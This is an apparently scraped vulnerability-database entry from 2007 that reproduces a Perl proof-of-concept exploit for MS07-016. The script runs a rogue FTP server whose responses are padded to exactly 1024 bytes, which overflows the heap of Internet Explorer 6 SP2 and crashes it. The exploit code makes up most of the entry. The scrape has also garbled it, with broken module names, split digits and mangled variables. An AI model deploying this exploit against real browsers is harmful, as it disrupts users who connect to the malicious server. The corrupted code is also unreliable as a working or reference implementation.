MS Internet Explorer (FTP Server Response) DoS Exp-vulnerability warning-the black bar safety net

2007-03-19T00:00:00
ID MYHACK58:62200714627
Type myhack58
Reporter 佚名
Modified 2007-03-19T00:00:00

Description

!/ usr/bin/perl

MS 07-016 FTP Server Response PoC

Usage: ./ ms07016ftp.pl [LISTEN_IP]

Tested Against: MSIE 6.02900.2180 (SP2)

Details: The response is broken into buffers, either at length 1 0 2 4,

or at '\r\n'. Each buffer is apended with \x00, without

bounds checking. If the response is exctly 1 0 2 4 characters

in length, you will overflow the heap with the string \x00.

use I:Socket; use strict;

Create listener

my $ip=shift || '127.0.0.1'; my $sock = I:Socket::INET->new(Listen=>1, LocalHost=>$ip, LocalPort=>'2 1', Proto=>'tcp'); $sock or die ("Could not create listener.\ nMake sure no FTP server is running, and you are running this as root.\ n");

Wait for initial connection and send banner

my $sock_in = $sock->accept(); print $sock_in "2 2 0 waa waa wee waa\r\n";

Send response code with total lenght of response = 1 0 2 4

while (<$sock_in>){ my $response; if($ eq "USER") { $response="3 3 1 ";} elsif($ eq "PASS") { $response="2 3 0 ";} elsif($ eq "syst") { $response="2 1 5 ";} elsif($ eq "CWD") { $response="2 5 0 ";} elsif($_ eq "PWD") { $response="2 3 0 ";} else { $response="2 0 0 ";} print $sock_in $response." A"x(1 0 2 4-length($response)-2)."\ r\n"; } close($sock);